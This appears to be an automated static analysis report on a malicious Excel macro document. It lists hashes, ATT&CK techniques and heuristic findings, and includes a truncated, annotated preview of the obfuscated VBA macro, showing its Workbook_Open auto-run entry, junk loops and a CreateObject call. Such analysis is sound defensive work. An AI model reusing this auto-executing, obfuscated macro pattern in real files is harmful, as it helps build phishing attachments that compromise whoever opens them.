Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6aeaf8de926d21b4…

MALICIOUS

Office (OLE)

60.0 KB Created: 2018-10-15 23:09:32 Authoring application: Microsoft Excel First seen: 2019-04-17
MD5: 86d5c99b3ec5d576fa9ab34f14af66f1 SHA-1: 50fa8c866071da9a76115912095bf34b776f5d5f SHA-256: 6aeaf8de926d21b40fdc254d48aca446058b87fb5abe036b71fb6e436e16a1a0
Risk Score: 202

Malware Insights

MITRE ATT&CK
T1059.005 (Command and Scripting Interpreter: Visual Basic); T1566.001 (Phishing: Spearphishing Attachment)

The file is an Excel document containing a Workbook_Open VBA macro. This macro uses a Shell() call and CreateObject, indicating it is designed to execute arbitrary code, likely to download and run a secondary payload (the CreateObject call is visible in the preview below; the Shell() call lies beyond the truncated portion). The VBA code is heavily obfuscated, making it difficult to determine the exact payload or destination; the sample is therefore classified as an unknown family.

Heuristics (6)

  • VBA macros detected — medium (4 related findings) — OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA — critical — OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro — high — OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call — high — OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens — high — OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact — info — EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15799 bytes
SHA-256: dccf55e3a98374352a3c1e7c4c454a4ea4dcf21099fb2820d2ccf8cf77b358f8
Detection
ClamAV: No threats found (signature-based check on the carved artifact only; it does not override the heuristic findings above)
Obfuscation or payload: likely
Carved artifact contains 6 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Auto-execution entry point: Excel runs this Sub when the workbook is opened
' (the OLE_VBA_WBOPEN finding above refers to this procedure).
Private Sub workbook_open()
' The only live statement in this Sub: a call into the module named Xb5IWYK
' (that module's header appears later in this listing; the called procedure
' itself is outside the visible, truncated preview).
Xb5IWYK.Kn1Qj1GkRHt8Ek_pgCaa
' Junk loop: the condition compares two unequal constants, so it is always
' false and the body never executes. Padding to defeat simple inspection.
While 9 = 4371
Dim VWrY_NOx_ESiuLftgJSRNw24B2K85OI3httw5ZQTjSkKxIK3DTHVrGKhdxW As Variant
Wend
' Unused declaration; not referenced anywhere in this Sub.
Dim FCQ2s6YA_b As Integer
' Junk loop (constant-false condition), same pattern as above.
While 10 = 2477
Dim sxE29r5Kp_1oR3jEvIYhJQFCIQQZ1NWGJYSeCdsYPUwreatW As Variant
Wend
' Unused declaration.
Dim PlIOkaPZpB As Integer

' Junk loop (constant-false condition).
While 23 = 7052
Dim rpYcSaprc2hDCQZ9PxcXgrf4HN_GfsG3y_uB_vBUAv71xLi1xkIa6Qd9HeS As Variant
Wend
' Unused declaration.
Dim UgJtsoNBeX9dvGV As Integer
' Junk loop (constant-false condition).
While 28 = 7895
Dim tto_6oLR5ho7fev2db7_cjKFH7fUYloox5sMcYVYHMOKD As Variant
Wend
' Unused declaration.
Dim rqfsecAyF3Hh As Integer
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Xb5IWYK"
' Module-level String. No assignment to it appears in the visible preview;
' further down in this module it is passed as the argument to CreateObject
' (the `Set ... = CreateObject(PP1RiHG...)` line), so its runtime value
' selects the COM object that gets instantiated — presumably set in the
' truncated part of the listing; confirm against the full artifact.
Dim PP1RiHGCTh67gWOwf8QQSa5gV5U2mQtF1rZrSWsHa3RqtdG_t_mVJw6yTS6mwNYBwyEy7fbGMHzYHMw1 As String
 Function g59G13Q2_HkugWD_g1NT9CZN9l3GmzpBjo5dWPQT8SCiEtKFY(I8KiXLeX4A_5NhVxeIUYPRq_Jea1bV5kkWBIL8qYJ2_KsRExwcxgGcMzOJX3tn6g_bR1eLkgb6MXMdP2YmC8gVbFHK4Bixof5gEO9NQj2P_KNylt3ebEj79r9KqSQi7mOqbpX_2JTbEO)
While 4 = 2838
Dim pjS_ZZMLHdFRtPu4xgEhVG73UIIVTJj8LqmafynxWmnxGTAVSk9KwI As Variant
Wend
Dim dglYnOPz174GEC As Integer
While 24 = 5396
Dim mSV82QIrcHt_HvCrJWJCK_xEJWffup39N7s9NAR As Variant
Wend
Dim e9uDcnmFcwGue7C As Integer
While 28 = 7492
Dim geOwctm7vNuuJBDcIDnCY_SZgPCsl4WAJEKb8LxtTxQN315ar As Variant
Wend
Dim mkZR9ZfJxOLq3S1 As Integer

 Dim Eup2j5eKVw3CEvUm8rc9WO2kgkMKDqJVEYt5_jBNeuUy7_agnmooUB6z3DS9qSGolf7pBZhWoMcl3BnbHofYAdADc4B_OBgKloLYGudM_Q9FhR6zYzyAvrnFd3LGXhFlpQ9MyMTVIRTrd3d
While 11 = 1428
Dim siDzje6N3qkr_foUj_9R6rKonQH7kCacYWIPzjG As Variant
Wend
Dim GnJXPxwEPizE2T As Integer
While 10 = 6925
Dim g4_WXJRU9lzOFRqVWd92zntS4zzJ2Vu7hH1bI As Variant
Wend
Dim aXyvoghApdX4KUE As Integer
While 14 = 8626
Dim c3IpbgTFcl12q8ZNKdCiBD9Kt3HTv7JXz As Variant
Wend
Dim gn8QbY3DqQCoo As Integer


   Dim QiDSctSx3beWCifRDaRpLZ694BXnvfb95TX8_qEscDp_QHiucshsU_KzmDYZUnBU9eaqIhMUUhKHtzqubmJB8smzHhTAQnWyBS
While 12 = 3467
Dim SrDHqpQe8X475hW9TeZbBHRb6rDIeTu5e_iZPlN As Variant
Wend
Dim cESiNCSgzdDVvk As Integer
While 23 = 4821
Dim LmIXjL8lG_mm8az97qqO7UqhCYkJMnZ79SQaYApXP18S6kD2q1f As Variant
Wend
Dim Unem15jUJkwXbho As Integer
While 24 = 2839
Dim mmHXi5AQ9EWWlZTrcUFDQcoZexodwbbdtP8YsRQkS As Variant
Wend
Dim Vegcg84z2S As Integer
   
While 25 = 419
Dim BUdVI7r2tNfcem3mUb49JDes57G78zun5HYHN3xb_YfUw2 As Variant
Wend
Dim j4ka62G8ytaK As Integer
While 27 = 8663
Dim yu44c2hULtWama8tfH5C7MUDMSrB_aRdaklNek25SmpzfHw As Variant
Wend
Dim c3WZpxXNkX As Integer
While 24 = 9529
Dim ypHIeTuZ2_AxsN5O_sRfegDfMHl_loCVAzo5suwQ5XmHu As Variant
Wend
Dim oIHeYxo5_2Q As Integer
 Set QiDSctSx3beWCifRDaRpLZ694BXnvfb95TX8_qEscDp_QHiucshsU_KzmDYZUnBU9eaqIhMUUhKHtzqubmJB8smzHhTAQnWyBS = CreateObject(PP1RiHGCTh67gWOwf8QQSa5gV5U2mQtF1rZrSWsHa3RqtdG_t_mVJw6yTS6mwNYBwyEy7fbGMHzYHMw1)
While 27 = 2701
Dim kl5VrtxL7nw2h9fM5AjF45th8cdK1WZ57VREyYiJiYJE1Pie2is4cuWp As Variant
Wend
Dim VXNNkUiM15JoY As Integer
While 22 = 2836
Dim XdZXfcsmpp38SPmeZK9kNbAT58
... (truncated)